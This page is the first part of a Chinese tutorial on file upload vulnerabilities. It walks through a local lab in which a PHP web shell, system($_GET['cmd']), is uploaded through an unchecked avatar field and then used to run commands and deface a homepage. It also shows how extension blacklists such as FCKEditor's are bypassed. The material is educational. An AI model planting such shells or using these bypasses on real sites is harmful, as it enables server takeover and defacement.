登录  /  注册

文件上传漏洞实例分析

php中文网
发布: 2016-06-23 13:15:47
原创
1578人浏览过

原理

文件上传是Web应用中经常出现的功能,它允许用户上传文件到服务器并保存到特定位置。这对安全来说是一个很敏感的问题,一旦恶意程序被上传到服务器并获得执行权限,后果将不堪设想。因此绝大多数的Web应用都对文件上传功能有很多限制。文件上传漏洞指攻击者利用程序缺陷绕过系统对文件的验证与处理策略将恶意程序上传到服务器并获得执行服务器端命令的能力。这种攻击方式直接、有效,在对付某些脆弱的系统时甚至没有门槛。

文件上传漏洞的常见利用方式有:

上传Web脚本程序,Web容器解释执行上传的恶意脚本。

上传Flash跨域策略文件crossdomain.xml,修改访问权限(其他策略文件利用方式类似)。

上传病毒、木马文件,诱骗用户和管理员下载执行。

上传包含脚本的图片,某些浏览器的低级版本会执行该脚本,用于钓鱼和欺诈。

总的来说,利用的上传文件要么具备可执行能力(恶意程序),要么具备影响服务器行为的能力(配置文件). 为了实现一次攻击利用,必须要满足以下条件:

文件能通过前端和后端的过滤和文件处理.

文件内容不会被改变,能够被正确的存储

存储位置是在Web容器控制范围

攻击者有权限访问存储目录

我们通过实验来演示利用方式一,包含以下材料:

regist文件夹(存在漏洞的eb应用)

hacker.php(待上传的恶意脚本)

hacked.html (黑页待替换的新主页)

使用以下命令下载实验材料到虚拟机任意目录下并解压.

wget http://labfile.oss.aliyuncs.com/courses/443/stuffs.tar.gztar -xzf stuffs.tar.gzcd stuffs

1.部署web应用

将regist文件夹拷贝到/var/www/html/目录下

sudo cp -R regist /var/www/html/

regist文件夹的目录结构如下

index.html (前端注册页面)

regist.php (后台注册处理程序)

upload/ (文件上传目录)

css/ (样式文件目录)

fonts/ (字体文件目录)

js/ (脚本文件目录)

修改目录权限:

sudo chmod 777 /var/www/html/regist -R启动Apache2服务

sudo service apache2 start

2.上传恶意脚本程序

这是一个常见的新用户注册页面,我们随意填写注册信息.我们注意到,虽然这个页面对用户输入的文本信息有较为仔细的校验,但是并没有对上传头像的类型进行严格的检查,这是非常危险的行为.在上传头像处选择事先准备好的恶意PHP程序hacker.php.确认无误,点击注册.(用同样的方法上传hacked.html)

3.访问脚本程序

通过目录结构知道上传后的文件被存储在upload/目录下.上传的PHP文件可以通过在浏览器地址栏中输入http://localhost/regist/upload/hacker.php来访问

hacker.php源代码如下:

cmd:

result:

事实上,你可以在脚本文件中编写任意你喜欢的代码,只要构造得当并能够被顺利执行.

核心代码system($_GET['cmd']);调用php系统函数system来执行linux系统命令,命令从GET请求中的cmd参数获取.这意味着我们可以在当前用户权限下执行任意的linux命令,就像操作本地计算机一样.先测试一下恶意程序能否正常运行:

http://localhost/regist/upload/hacker.php?cmd=whoami

运行成功,这也意味着后端负责上传功能的程序模块没有对上传文件做有效的过滤和处理.接着,我们使用上传的hacke.html页面来替换网站首页:

http://localhost/regist/upload/hacker.php?cmd=mv hacked.html ../index.html

再次访问Web应用localhost/regist,刷新页面,发现替换成功,页面显示"You Are Hacked".

注意,这里需要将hacked.html上传至 /upload目录下

思考与扩展

1.类型检查

实验步骤中的网站前端部分没有对文件上传做有效的过滤与处理,同类的著名漏洞还有FCKEditor文件上传漏洞,FCKEditor是一款非常流行的富文本编辑器,某个PHP版本出过一个文件上传类型检查的漏洞,相关代码如下:

$Config['AllowdExtensions']['File'] = array();//允许上传的类型$Config['DenedExtensions']['File'] =array('php', 'php3', 'php5', 'phtml', 'asp', 'aspx', 'ascx', 'jsp', 'cfm', 'cfc', 'pl','pl','bat', 'exe', 'dll', 'reg', 'cgi' );//禁止上传的类型

可以看到,代码针对文件类型进行了检查,但使用了黑名单方式,所以如果我们使用php2、inc等类型名时就可以通过类型检查.另外,对于前端校验,在通常情况下可以通过修改或伪造POST包来绕过。

2.权限需求为了达到攻击效果,实验步骤简化了一些复杂的细节.一些关键步骤都涉及到了操作权限.步骤对应所需的权限如下表:

步骤或操作        权限要求

[1]   [2]    下一页

智能AI问答
PHP中文网智能助手能迅速回答你的编程问题,提供实时的代码和解决方案,帮助你解决各种难题。不仅如此,它还能提供编程资源和学习指导,帮助你快速提升编程技能。无论你是初学者还是专业人士,AI智能助手都能成为你的可靠助手,助力你在编程领域取得更大的成就。
来源:php中文网
本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系admin@php.cn
最新问题
关于CSS思维导图的课件在哪? 课件
凡人来自于2024-04-16 10:10:18
热门教程
更多>
最新下载
更多>
网站特效
网站源码
网站素材
前端模板
关于我们 免责申明 意见反馈 讲师合作 广告合作 最新更新
php中文网:公益在线php培训,帮助PHP学习者快速成长!
关注服务号 技术交流群
PHP中文网订阅号
每天精选资源文章推送
PHP中文网APP
随时随地碎片化学习
PHP中文网抖音号
发现有趣的

Copyright 2014-2024 https://www.php.cn/ All Rights Reserved | php.cn | 湘ICP备2023035733号